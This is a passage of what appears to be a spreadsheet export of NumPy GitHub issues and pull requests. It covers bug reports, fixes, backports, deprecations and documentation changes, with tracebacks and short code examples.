_x000D_
    Nvsnap[:, isnap] = Nv_x000D_
    Nasnap[:, isnap] = Na_x000D_
    Nbsnap[:, isnap] = Nb_x000D_
    Ncsnap[:, isnap] = Nc_x000D_
_x000D_
    # record time_x000D_
    tcur = tcur + h_x000D_
    isnap = isnap + 1_x000D_
_x000D_
# save uksnap_x000D_
np.savez('output_uk',uksnap=uksnap,f1=f1,f2=f2,f3=f3,Q=Q,LR=LR,L=L,g=g, Nasnap=Nasnap, Nvsnap=Nvsnap, Nbsnap=Nbsnap, Ncsnap=Ncsnap,_x000D_
         aasnap=aasnap, bbsnap=bbsnap, ccsnap=ccsnap, usnap=usnap)_x000D_
_x000D_
# plot contours_x000D_
from matplotlib import cm_x000D_
_x000D_
fig = plt.figure(figsize=(8, 8))_x000D_
X, Y = np.meshgrid(x, tsnap)_x000D_
Z = usnap.transpose()_x000D_
V = np.linspace(-10, 10, 500)_x000D_
surf = plt.contourf(X, Y, Z, V, cmap=cm.seismic)_x000D_
plt.savefig('contour.png')_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>Weird behavior of Numpy.fft in solving a chaotic system</t>
  </si>
  <si>
    <t xml:space="preserve">```https://github.com/numpy/numpy/search?utf8=%E2%9C%93&amp;q=tramy.us&amp;type=```_x000D_
directs to `http://ww12.tramy.us/`, which definitely isn't the `Guide to Numpy`, and looks somewhat dodgy._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Link to Oliphants Guide to Numpy is broken</t>
  </si>
  <si>
    <t>['04 - Documentation', '17 - Task']</t>
  </si>
  <si>
    <t>Make np.linalg.cond(A, p) always use SVD for p=+-2 and not only p=None._x000D_
_x000D_
Ensure inf is returned instead of nan when the condition number diverges_x000D_
for +/-2 norm._x000D_
_x000D_
Ignore errors when inverting matrices for p = +-1, 'fro', +-inf, so that_x000D_
spurious LinAlgErrors are not raised.  In those cases, report_x000D_
non-invertible matrices as having cond=inf._x000D_
_x000D_
For this latter set of norms, the computation is still somewhat naively done because we are not basing it on a decomposition, so the number computed when the matrix is close to singular will be large but not very accurate. On the other hand, exact and stable computation of the condition numbers in these norms probably requires quite a bit more care, and svd/qr/etc are not as immediately helpful as for 2-norm. (I think LAPACK has routines that estimate the condition number in 1-norm, but no exact computation.)_x000D_
_x000D_
Add additional tests for cond()._x000D_
_x000D_
Fixes gh-8090_x000D_
Fixes gh-7907</t>
  </si>
  <si>
    <t>BUG: Fix corner-case behavior of cond() and use SVD when possible</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have intel compilers installed, but get this:_x000D_
```_x000D_
Found executable /opt/intel/compilers_and_libraries_2018.1.163/linux/bin/intel64/icc customize IntelEM64TFCompiler_x000D_
Found executable /opt/intel/compilers_and_libraries_2018.1.163/linux/bin/intel64/ifort_x000D_
Traceback (most recent call last):_x000D_
File "setup.py", line 418, in &lt;module&gt;setup_package()_x000D_
File "setup.py", line 414, in setup_packagesetup(**metadata)_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/core.py", line 169, in setupreturn old_setup(**new_attr)_x000D_
File "/usr/lib/python3.6/site-packages/setuptools/__init__.py", line 129, in setupreturn distutils.core.setup(**attrs)_x000D_
File "/usr/lib/python3.6/distutils/core.py", line 148, in setupdist.run_commands()_x000D_
File "/usr/lib/python3.6/distutils/dist.py", line 955, in run_commandsself.run_command(cmd)_x000D_
File "/usr/lib/python3.6/distutils/dist.py", line 974, in run_commandcmd_obj.run()_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/command/build_clib.py", line 75, in runself.run_command('build_src')_x000D_
File "/usr/lib/python3.6/distutils/cmd.py", line 313, in run_commandself.distribution.run_command(command)_x000D_
File "/usr/lib/python3.6/distutils/dist.py", line 974, in run_commandcmd_obj.run()_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/command/build_src.py", line 148, in runself.build_sources()_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/command/build_src.py", line 165, in build_sourcesself.build_extension_sources(ext)_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/command/build_src.py", line 324, in build_extension_sourcessources = self.generate_sources(sources, ext)_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/command/build_src.py", line 377, in generate_sourcessource = func(extension, build_dir)_x000D_
File "scipy/_lib/setup.py", line 32, in get_messagestream_configif config_cmd.check_func('open_memstream', decl=True, call=True):_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/command/config.py", line 312, in check_funcself._check_compiler()_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/command/config.py", line 83, in _check_compilerself.fcompiler.customize(self.distribution)_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/fcompiler/__init__.py", line 499, in customizeget_flags('opt', oflags)_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/fcompiler/__init__.py", line 490, in get_flagsflags.extend(getattr(self.flag_vars, tag))_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/environment.py", line 39, in __getattr__return self._get_var(name, conf_desc)_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/environment.py", line 53, in _get_varvar = self._hook_handler(name, hook)_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/fcompiler/__init__.py", line 697, in _environment_hookreturn hook()_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/fcompiler/intel.py", line 125, in get_flags_optv = self.get_version()_x000D_
File "/usr/lib/python3.6/site-packages/numpy/distutils/fcompiler/__init__.py", line 430, in get_versionraise CompilerNotFound()_x000D_
numpy.distutils.fcompiler.CompilerNotFound_x000D_
```</t>
  </si>
  <si>
    <t>[BUG] Intel Fortran compiler installed but not found</t>
  </si>
  <si>
    <t>The sort order can vary depending on the type of the original array,_x000D_
resulting in unexpected results. Document that in the docstring of_x000D_
np.unique._x000D_
_x000D_
Closes #10495.</t>
  </si>
  <si>
    <t>DOC: Describe unique sort order when axis is specified.</t>
  </si>
  <si>
    <t>`PyErr_NoMemory` return `PyObject *`, but this function returns `PyArray_Descr *`. `runtests.py` doesn't report this locally, and #10555 was merged before travis finished</t>
  </si>
  <si>
    <t>BUG: Fix travis failure in previous commit</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #10265 _x000D_
_x000D_
memory view of scalars will report correct format code as well as ndim==0 and empty shape/strides/suboffsets_x000D_
_x000D_
Previous behaviour had memoryview of all scalars be an array of bytes._x000D_
_x000D_
Format code is stored in `Py_buffer.internal`. This was a simple place to store that didn't require an allocation of memory. This does somewhat duplicate code in buffer.c. However scalars are a subset of dtypes, that are always native size and aligned and only a single element, and so the resulting code could be simplified to a simple switch statement._x000D_
_x000D_
Tests check that scalar format code matches the format code of an empty `array` with dtype matching the scalar._x000D_
_x000D_
dtypes `intp` and `uintp` are seem to be analogous to c pointers and according to PEP3118 should report a format code of 'p' or 'P' respectively. However `array`s of this dtype use the integer format code. This patch follows that precedent._x000D_
</t>
  </si>
  <si>
    <t>BUG: Provide correct format in Py_buffer for scalars</t>
  </si>
  <si>
    <t>Backport of #10342._x000D_
_x000D_
According to the docstring, the arguments to numpy.union1d(ar1, ar2) "are flattened if they are not already 1D."_x000D_
This solves #10340</t>
  </si>
  <si>
    <t>BUG: arrays not being flattened in `union1d`</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>Backport of #10391._x000D_
_x000D_
cc @ahaldane since #6053 exposes this to user code more often._x000D_
_x000D_
Currently returns garbage, Now_x000D_
```_x000D_
&gt;&gt;&gt; data = np.zeros(1, dtype=[('a', int), ('b', float)])_x000D_
&gt;&gt;&gt; data = data[['b','a']]_x000D_
&gt;&gt;&gt; data.dtype.descr_x000D_
ValueError_x000D_
```</t>
  </si>
  <si>
    <t>BUG: Make dtype.descr error for out-of-order fields.</t>
  </si>
  <si>
    <t>Backport of #10433._x000D_
_x000D_
This fixes a few miscellaneous test failures on ppc64 (big endian). They're all problems with the test, not numpy._x000D_
_x000D_
There is an additional heisenbug which I haven't been able to track down since it only occurs rarely, randomly: The test test_require_each occasionally fails to set the "align" flag on a complex128 array. May be related to #6377._x000D_
_x000D_
After these fixes, the only remaining ppc64 test failures are for float128 types (fixed on my local copy, to submit soon), and #10442.</t>
  </si>
  <si>
    <t>BUG: Fix various Big-Endian test failures (ppc64)</t>
  </si>
  <si>
    <t>Backport of #10479._x000D_
_x000D_
Currently, this causes the result to inherit the output's mask._x000D_
_x000D_
This brings `np.add(a, b, out)` in line with  `np.add(a, b, out=out)`._x000D_
These previously differed because gh-10459 causes them to call_x000D_
__array_wrap__ in different ways (with and without the output argument_x000D_
in the context tuple, respectively)._x000D_
_x000D_
Since the data in the `out` argument is never used by ufuncs, it seems_x000D_
consistent that the mask should not be either.</t>
  </si>
  <si>
    <t>BUG: Fix calling ufuncs with a positional output argument.</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.ma']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #10352._x000D_
_x000D_
Closes #10343._x000D_
_x000D_
I don't know if it's the correct fix because these functions have a lot of logic going on that I have never looked at before (and haven't looked at too closely). Feel free to close if the right solution is a bit more involved._x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix einsum optimize logic for singleton dimensions</t>
  </si>
  <si>
    <t>Currently records specified as lists of lists instead of lists of tuples_x000D_
are caught and fixed up in fromrecords. Unfortunately, the detection is_x000D_
failing due to various fixes in the records module. The failure is_x000D_
worked around by generalizing the detection. A FutureWarning that such_x000D_
record specifications will result in an error in the future is also_x000D_
emitted._x000D_
_x000D_
Fixes #10344._x000D_
_x000D_
Note that is  no longer needed for 1.14.1, but a backport is suggested just to get the warning out there.</t>
  </si>
  <si>
    <t>DEP: Issue FutureWarning when malformed records detected.</t>
  </si>
  <si>
    <t xml:space="preserve">Without this fix, arrays returned by the ARGOUTVIEW_FARRAY[2,3,4] ARGOUTVIEWM_FARRAY[2,3,4] typemaps have always the flag C_CONTIGUOUS as True even when the underlying buffer is not C contiguous leading to strange runtime behaviors._x000D_
_x000D_
Ex: copy() works correctly but binary element wise operations with another C contiguous array does not. </t>
  </si>
  <si>
    <t>BUG: In numpy.i, clear CARRAY flag if wrapped buffer is not C_CONTIGUOUS.</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: swig']</t>
  </si>
  <si>
    <t>BUG: Add missing PyErr_NoMemory() after malloc</t>
  </si>
  <si>
    <t>Despite the fact it would be nice if it was_x000D_
_x000D_
Also give an example of the non-associative case.</t>
  </si>
  <si>
    <t>DOC: promote_types is not associative by design,</t>
  </si>
  <si>
    <t xml:space="preserve">Moving the fast path does mean we do a redundant refcount spike, but that's a small price to pay._x000D_
This check was in three of the four places we called the function, and since its a no-op, it should be fine to add it in the last (`np.promote_types`)._x000D_
_x000D_
The second commit just moves some variables to tighter scopes._x000D_
_x000D_
There's a behavior change I want to introduce once this goes in..._x000D_
_x000D_
Follows on from #10325 </t>
  </si>
  <si>
    <t>MAINT: Cleanups to promote_types and result_types</t>
  </si>
  <si>
    <t>This would be straightforward with `ExitStack`, but I don't feel like backporting something that big from py3k.</t>
  </si>
  <si>
    <t>BUG: memmap close files when it shouldn't, load leaves them open when it shouldn't</t>
  </si>
  <si>
    <t>[Backportable here](https://github.com/numpy/numpy/compare/maintenance/1.14.x...eric-wieser:malloc-error?expand=1) if necessary, but probably not worthwhile</t>
  </si>
  <si>
    <t>BUG: Set missing exception after malloc</t>
  </si>
  <si>
    <t>This is a breaking change for python 3, because the Mapping protocol changed between python 2 and python 3. In practice, any user running `2to3` should have found this fixed itself automatically._x000D_
_x000D_
Fixes gh-1723</t>
  </si>
  <si>
    <t>ENH: Make NpzFile conform to the Mapping protocol</t>
  </si>
  <si>
    <t>DOC: Bug fix in explanatory note for the gradient function. Fixes #10545 _x000D_
_x000D_
Original rendered docs [here](https://docs.scipy.org/doc/numpy-1.14.0/reference/generated/numpy.gradient.html)</t>
  </si>
  <si>
    <t>DOC: Fix incorrect formula in gradient docstring.</t>
  </si>
  <si>
    <t>Backport of #10361, fixes #10517</t>
  </si>
  <si>
    <t>BUG: complex repr has extra spaces, missing + (1.14 backport)</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Avoid test failures for backports.</t>
  </si>
  <si>
    <t>TST: Add circleci document testing to maintenance/1.14.x</t>
  </si>
  <si>
    <t>['05 - Testing', '08 - Backport']</t>
  </si>
  <si>
    <t>The Long number is downcast to int if possible, so the old version_x000D_
has to be DECREF'ed._x000D_
_x000D_
Thanks to Johannes Barthelmes for bisecting the offending commit._x000D_
_x000D_
Closes gh-10474_x000D_
_x000D_
Backport of gh-10482</t>
  </si>
  <si>
    <t>BUG: Add missing DECREF in Py2 int() cast</t>
  </si>
  <si>
    <t>Workaround for the tokenizer issue with python 2.7.5. Closes #10348.</t>
  </si>
  <si>
    <t>BUG: fix np.save issue with python 2.7.5</t>
  </si>
  <si>
    <t>Fixes #10387_x000D_
Fixes #10344_x000D_
Fixes #10409 _x000D_
_x000D_
This is a version of #10411 targeting the 1.14.x maintenance branch. It reverts the copy-&gt;view change from 1.14.0, aiming to get into 1.14.1.</t>
  </si>
  <si>
    <t>BUG: multifield-indexing adds padding bytes: revert for 1.14.1</t>
  </si>
  <si>
    <t>Backport of #10401 .</t>
  </si>
  <si>
    <t>BUG: Resize bytes_ columns in genfromtxt (backport of #10401)</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport']</t>
  </si>
  <si>
    <t>Fixes gh-10389._x000D_
_x000D_
Marking as 1.14.1 since this was exposed by the structured field change</t>
  </si>
  <si>
    <t>BUG: Provide a better error message for out-of-order fields</t>
  </si>
  <si>
    <t>```python_x000D_
class Foo(ctypes.BigEndianStructure):_x000D_
    _fields_ = [('one', ctypes.c_uint32)]_x000D_
```_x000D_
Gives a little-endian result:_x000D_
```_x000D_
&gt;&gt;&gt; np.dtype(Foo)_x000D_
dtype([('one', '&lt;u4')], align=True)_x000D_
```</t>
  </si>
  <si>
    <t>BUG: np.dtype(ctype) does not respect endianness</t>
  </si>
  <si>
    <t>```python_x000D_
class Foo(ctypes.Structure):_x000D_
    _fields_ = [('one', ctypes.c_uint8), ('two', ctypes.c_uint32)]_x000D_
    _pack_ = 2_x000D_
```_x000D_
```python_x000D_
&gt;&gt;&gt; ctypes.sizeof(Foo())  # packed to alignment 2_x000D_
6_x000D_
&gt;&gt;&gt; np.dtype(Foo).itemsize  # default alignment incorrectly used_x000D_
8_x000D_
```_x000D_
_x000D_
_x000D_
Fix should be fairly straightforward by changing:_x000D_
_x000D_
https://github.com/numpy/numpy/blob/44810f07ec6a281d96d6a69c105ce6ae59aec718/numpy/core/_dtype_ctypes.py#L35-L46</t>
  </si>
  <si>
    <t>BUG: np.dtype(ctypes.Structure) does not respect _pack_ field</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.core', 'good first issue']</t>
  </si>
  <si>
    <t>This seems like a bug inherited from ctypes, so maybe we need a workaround:_x000D_
_x000D_
Start off with a very simple struct:_x000D_
```python_x000D_
class foo(ctypes.Structure):_x000D_
    _fields_ = [('a', ctypes.c_uint8), ('b', ctypes.c_uint32)]_x000D_
f = foo()_x000D_
```_x000D_
_x000D_
We'd expect this to insert padding, and it does:_x000D_
```python_x000D_
&gt;&gt;&gt; memoryview(f).itemsize  # ok_x000D_
8_x000D_
```_x000D_
But that padding doesn't show up in the format string:_x000D_
```python_x000D_
&gt;&gt;&gt; memoryview(f).format_x000D_
'T{&lt;B:a:&lt;I:b:}'_x000D_
```_x000D_
The docs for `struct` say that_x000D_
&gt; No padding is added when using non-native size and alignment, e.g. with ‘&lt;’, ‘&gt;’ "_x000D_
_x000D_
So this format has size 5, which contradicts `itemsize`._x000D_
_x000D_
Sure enough, we catch this in our PEP3118 parser:_x000D_
```python_x000D_
&gt;&gt;&gt; np.array(f)_x000D_
RuntimeWarning: Item size computed from the PEP 3118 buffer format string does not match the actual item size._x000D_
Out[45]: array(&lt;__main__.foo object at 0x7f2715469bf8&gt;, dtype=object)_x000D_
```_x000D_
_x000D_
I suspect there's already an issue for this - perhaps we need a PEP3118 tag._x000D_
_x000D_
The fix would be to special case `ctypes` objects in the array constructor, and not call `memoryview` on them because it doesn't actually work._x000D_
_x000D_
---_x000D_
_x000D_
Worse yet, numpy doesn't stand a chance with an _unpadded_ struct:_x000D_
```python_x000D_
class foo(ctypes.Structure):_x000D_
    _fields_ = [('a', ctypes.c_uint8), ('b', ctypes.c_uint32)]_x000D_
    _pack_ = 1_x000D_
f = foo()_x000D_
```_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; memoryview(f).itemsize  # ok_x000D_
5_x000D_
&gt;&gt;&gt; memoryview(f).format  # WAT_x000D_
'B'_x000D_
```</t>
  </si>
  <si>
    <t>BUG: Cannot convert ctypes struct into numpy array</t>
  </si>
  <si>
    <t>Refactoring of format.py in order to remove code duplication and improve readability and maintainability._x000D_
_x000D_
The computation of the required padding bytes (for alignment) was fixed, although it was only a very minor issue: in case the output would have been already perfectly aligned, 64 more bytes would have been added (which does not seem a big issue to me) and this could also lead to usage of header format version 2, where version 1 would have been sufficient (even less likely and also not a big issue)._x000D_
_x000D_
Please let me know if you want me to go further with the refactoring. The reading (deserialization) could be refactored in the same spirit. Alignment and buffer sizes (for reading / writing) could be made configurable via parameters. Unit tests should be much easier using the new classes and could be adapted accordingly.</t>
  </si>
  <si>
    <t>MAINT: Refactor numpy/lib/format.py</t>
  </si>
  <si>
    <t>['03 - Maintenance', '57 - Close?', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>The changes include a bugfix for this issue here (tested it with python 2.7.5 and 2.7.14, but unfortunately I cannot test it with python 3). This is basically the last commit. I went for the easy solution, adding a newline right before the filtering and removing it after the filtering. To make this work I also had to change from StringIO.read to StringIO.readline (which seems more appropriate in any case)._x000D_
_x000D_
Apart from that I started with some refactoring to make the code more readable and more testable. It should also be quite easy to make the alignment configurable now. I could continue a bit more into that direction, but I would be happy about a bit of feedback at this point._x000D_
_x000D_
It is also not really clear to me, what is part of the public API of the format module. To me the methods of interest are `write_array`, `read_array` and `open_mmap`. The methods `magic`, `read_magic`, `dtype_to_descr`, `header_data_from_array_1_0`, `write_array_header_1_0`, `write_array_header_2_0`, `read_array_header_1_0`, `read_array_header_2_0` do not look like they should be exposed. What is the reason behind that?</t>
  </si>
  <si>
    <t>BUG: fix np.save tokenizer for python 2.7.5</t>
  </si>
  <si>
    <t>Fixes #10461.</t>
  </si>
  <si>
    <t>MAINT: Remove the unmaintained umath ``__version__`` constant.</t>
  </si>
  <si>
    <t>This change _NoValue from a class to an instance, which is more inline with the builtin None._x000D_
_x000D_
Fixes gh-8991, closes gh-9592.</t>
  </si>
  <si>
    <t>ENH: Add a repr to np._NoValue</t>
  </si>
  <si>
    <t>Probably doesn't matter in any real way, but this seems more correct._x000D_
_x000D_
Extracted from #8955.</t>
  </si>
  <si>
    <t>MAINT: Allow errors to escape from InitOperators</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have anaconda in my machine and using python 2.7. I uninstalled/installed  the numpy library using `conda install -n base  numpy`. After new installation when I import numpy I get this error:_x000D_
```_x000D_
&gt;&gt;&gt; import numpy_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/anaconda2/lib/python2.7/site-packages/numpy/__init__.py", line 112, in &lt;module&gt;_x000D_
    from ._globals import ModuleDeprecationWarning, VisibleDeprecationWarning_x000D_
ImportError: No module named _globals_x000D_
&gt;&gt;&gt; quit()_x000D_
```_x000D_
I read different answers for similar problem, namely a conflict between version of numpy and python but I did not figure out how it should be resolved. Any suggestion how to deal with this issue will be appreciated.</t>
  </si>
  <si>
    <t>from ._globals import ModuleDeprecationWarning, VisibleDeprecationWarning ImportError: No module named _globa</t>
  </si>
  <si>
    <t>Popping the first commit off #8955 to at least get some of that patch in</t>
  </si>
  <si>
    <t>MAINT: Use new-style format strings for clarity</t>
  </si>
  <si>
    <t>Without this, it fails if one of the includes is changed to import numpy headers._x000D_
_x000D_
This file seems to be the only one that omitted this</t>
  </si>
  <si>
    <t>BUG: Add missing `#define _MULTIARRAYMODULE` to vdot.c</t>
  </si>
  <si>
    <t>This only covers the trivial cases. About 1/3 of these already used `try`/`finally`._x000D_
_x000D_
The places not handled in this commit are primarily those that deal with conditional ownership, when a string filename is passed instead of a file. Unfortunately, those are also the ones with the most impact to users, but I figured I'd get the easy but tedious fix out of the way._x000D_
_x000D_
Happy to exclude subtrees from this PR if they're considered "off-limits" for non-bugfixes - just tell me which ones._x000D_
_x000D_
I've ignored the tests because there are far too many to fix there.</t>
  </si>
  <si>
    <t>MAINT: Use `with` statements to handle files</t>
  </si>
  <si>
    <t>This file contains outdated copies of the functions in core/setup_common.py</t>
  </si>
  <si>
    <t>MAINT: Delete unused `_build_utils/common.py`</t>
  </si>
  <si>
    <t>Closes #13844_x000D_
_x000D_
This PR adds a new document illustrating a very simple custom array container implementing `__array_ufunc__` and `__array_function__`. It also rephrases the documentation on subclasses to direct users toward considering dispatch instead of inheritance._x000D_
_x000D_
Additional work is needed to restructure the documentation to make this new document easier for developers to discover and to provide more context about when to choose inheritance (rarely but sometimes still the right choice) or dispatch. I propose to defer that larger effort to a separate PR and get this published soon so that _some_ high-level documentation on `__array_function__` is at least available._x000D_
_x000D_
Feel free to take a heavy hand to this in reviewing/editing. I wrote this with the perspective of someone who has been following the `__array_function__` conversation but has not thought deeply about the design._x000D_
_x000D_
@shoyer Any input of yours on this would be especially welcome.</t>
  </si>
  <si>
    <t>DOC: Document array_function at a higher level.</t>
  </si>
  <si>
    <t>When a buffer interface does not request a writeable buffer,_x000D_
simply pass a read-only one when the warn on write flag is set._x000D_
_x000D_
This is to give an easier way forward with avoiding the deprecation_x000D_
warnings: Simply do not ask for a writeable buffer._x000D_
_x000D_
It will break code that expects writeable buffers but does not_x000D_
ask for them specifically a bit harder than would be nice._x000D_
But since such code probably should ask for it specifically, this_x000D_
is likely fine (an RC release has to find out)._x000D_
_x000D_
The main reason for this is, that this way it plays very will with_x000D_
cython, which requests writeable buffers explicitly and if declared_x000D_
`const` is happy about read-only (so that using `const` is the best_x000D_
way to avoid the warning and makes code cleaner)._x000D_
_x000D_
Closes gh-13929, gh-13974_x000D_
_x000D_
---_x000D_
_x000D_
There are two things:_x000D_
 1. [ ] We need to decide that we want to do this, to me this seems like a viable option (i.e. if someone does not *need* a writeable buffer as such, they should be fine, if someone needs a writeable buffer, they should be requesting it specifically._x000D_
 2. [ ] We could try to add a more descriptive message that tells someone things about memoryview (and even mentions cython) when this path is hit.</t>
  </si>
  <si>
    <t>DEP: Speed up WarnOnWrite deprecation in buffer interface</t>
  </si>
  <si>
    <t>Fixes #13526_x000D_
_x000D_
Replace usage of `test-installed-numpy.py` with `runtests.py`; they serve similar purposes_x000D_
and the latter is more commonly used / maintained. Compensate for increased warnings stringency of `runtests.py`, which picks up a warning from coverage.py._x000D_
_x000D_
If we have active devs using `tox`, they may want to advise on the pertinent changes there--I don't think this is probed by our CI in any way.</t>
  </si>
  <si>
    <t>MAINT, TST: remove test-installed-numpy.py</t>
  </si>
  <si>
    <t xml:space="preserve">Adding deprecation for NaN in `xp` in `np.interp`._x000D_
_x000D_
After some discussions with @seberg, we think the best way to address #13919 is to add a deprecation message with the end goal of raising an error if we found NaN in `xp`._x000D_
_x000D_
We are open to suggestions and discussions on other ideas to handle this problem._x000D_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</si>
  <si>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DEP: Add deprecation for NaN in xp in np.interp</t>
  </si>
  <si>
    <t>['07 - Deprecation', '54 - Needs decision']</t>
  </si>
  <si>
    <t>PR gh-12609 started a deprecation cycle to return read-only results from `numpy.broadcast_arrays`. In issue gh-13929 there was discussion of finishing the deprecation cycle immediately in the 1.17.0 release. This would require undoing all of gh-12609 and simply using the existing `readonly` kwarg when calling `_broadcast_to`_x000D_
_x000D_
This idea should  hit the mailing list</t>
  </si>
  <si>
    <t>DEP: finish deprecating readonly result from numpy.broadcast_arrays</t>
  </si>
  <si>
    <t xml:space="preserve">- use a simple hash table with linear probing_x000D_
- adjust heuristic_x000D_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</si>
  <si>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Rewrite Floyd algorithm</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.random']</t>
  </si>
  <si>
    <t>Backport of #13945 to 1.17.x_x000D_
_x000D_
Emphasize the difference between API methods on Generator and RandomState._x000D_
_x000D_
Remove Generator.randint which was broken and not tested anyway.</t>
  </si>
  <si>
    <t>DOC: emphasize random API changes</t>
  </si>
  <si>
    <t>['00 - Bug', '04 - Documentation', '08 - Backport']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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</si>
  <si>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spellcheck numpy/doc/broadcasting.py</t>
  </si>
  <si>
    <t>DOC: improve np.sort docstring</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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Added new recfunctions to `__all__` , and made a few fixes in the docstrings of the functions. </t>
  </si>
  <si>
    <t>BUG, DOC: add new recfunctions to `__all__`</t>
  </si>
  <si>
    <t>['00 - Bug', '04 - Documentation', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>Refactors all the different flavors of OpenBLAS download into a single file._x000D_
_x000D_
This can be tested when upgrading OpenBLAS by running `python tools/openblas_support.py --test`_x000D_
_x000D_
Once this goes in I propose to refactor [numpy-wheels](https://github.com/MacPython/numpy-wheels) to use it, which is why I suggest backporting it to  1.16.x._x000D_
_x000D_
It seems to me the travis builds are only using OpenBLAS for PPC64, or did I miss something?</t>
  </si>
  <si>
    <t>ENH, BUILD: refactor all OpenBLAS downloads into a single, testable file</t>
  </si>
  <si>
    <t xml:space="preserve">Backport #13920 to 1.17._x000D_
_x000D_
Refactors all the different flavors of OpenBLAS download into a single file._x000D_
_x000D_
This can be tested when upgrading OpenBLAS by running python tools/openblas_support.py --test_x000D_
_x000D_
Once this goes in I propose to refactor numpy-wheels to use it, which is why I suggest backporting it to 1.16.x._x000D_
</t>
  </si>
  <si>
    <t>BUILD: Backport 13920 to 1.17</t>
  </si>
  <si>
    <t>Backport #13920 to 1.16. _x000D_
_x000D_
Refactors all the different flavors of OpenBLAS download into a single file._x000D_
_x000D_
This can be tested when upgrading OpenBLAS by running python tools/openblas_support.py --test_x000D_
_x000D_
Once this goes in I propose to refactor numpy-wheels to use it, which is why I suggest backporting it to 1.16.x.</t>
  </si>
  <si>
    <t>BUILD: backport openblas_support #13920</t>
  </si>
  <si>
    <t>**Steps to reproduce:**_x000D_
* Assign a large integer above the limit for C `long` to a Python variable._x000D_
* Try to perform some scalar operation from numpy functions on that, e.g._x000D_
```python_x000D_
import numpy as np_x000D_
large_int = 12345678900000000000000000000_x000D_
np.log10(large_int)_x000D_
```_x000D_
_x000D_
**Expected behavior:** should cast it to the required type and output an answer._x000D_
_x000D_
**Actual behavior:** does not cast it, throws instead_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
AttributeError: 'int' object has no attribute 'log10'_x000D_
```_x000D_
_x000D_
Code works fine if it's converted to Python float beforehand:_x000D_
```python_x000D_
import numpy as np_x000D_
large_int = 12345678900000000000000000000_x000D_
np.log10(float(large_int))_x000D_
```</t>
  </si>
  <si>
    <t>Cannot apply numpy functions to large integers</t>
  </si>
  <si>
    <t>['01 - Enhancement', '23 - Wish List', '57 - Close?']</t>
  </si>
  <si>
    <t>I am using numpy 1.16.2 installed through Conda, and I found that if I take the negative of the cash flows I end up with the same value_x000D_
```_x000D_
import numpy_x000D_
_x000D_
cash_flow = numpy.array([-900, -500,  400,  400,  400,  400,  400,  400,  400,  400,  400])    _x000D_
_x000D_
irr=numpy.irr(cash_flow)    _x000D_
_x000D_
print(irr)    _x000D_
_x000D_
negatitve_irr = numpy.irr(-1*cash_flow)    _x000D_
_x000D_
print(negative_irr)    _x000D_
_x000D_
print(irr == negative_irr)    _x000D_
_x000D_
```_x000D_
The first and second print statements print_x000D_
0.20541421256305714_x000D_
The third prints_x000D_
True</t>
  </si>
  <si>
    <t>IRR calculates same irr if the cash flow signs are flipped</t>
  </si>
  <si>
    <t>['component: numpy.lib.financial']</t>
  </si>
  <si>
    <t xml:space="preserve">Zero isn't positive, so the correct term should be "non-negative"._x000D_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</si>
  <si>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Fix a typo related to the range of indices</t>
  </si>
  <si>
    <t>Code search suggests that  UFUNC_CHECK_STATUS and UFUNC_CHECK_ERROR are only found within ancient versions numpy. They are even documented to be internal (or deprecated). I think we should go for simply removing them. If someone really uses them, let them copy the macros into their own code.</t>
  </si>
  <si>
    <t>Remove UFUNC_CHECK_STATUS and UFUNC_CHECK_ERROR</t>
  </si>
  <si>
    <t>['component: Documentation', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>mingw32 version 5.3 is no longer provided on [Sourceforge](https://sourceforge.net/projects/mingw-w64/files/), try 7.3 instead.</t>
  </si>
  <si>
    <t>WIP, BUILD: update mingw32 from gcc5.3 to 7.3</t>
  </si>
  <si>
    <t>Whether or not we decide this is public API, @charris wanted to see a standard-style docstring, which I think is a pretty fair request.</t>
  </si>
  <si>
    <t>DOC: Add a numpy-doc docstring to add_newdoc</t>
  </si>
  <si>
    <t>xref gh-13938, gh-13939. _x000D_
_x000D_
Emphasize the difference between API methods on `Generator` and `RandomState`._x000D_
_x000D_
Remove `Generator.randint` which was broken and not tested anyway._x000D_
_x000D_
I did not add the `func = getattr(rng, 'integers', getattr(rng, 'randint', None))` workaround suggestion to the docs, should I?</t>
  </si>
  <si>
    <t>DOC, MAINT: emphasize random API changes, remove Generator.randint</t>
  </si>
  <si>
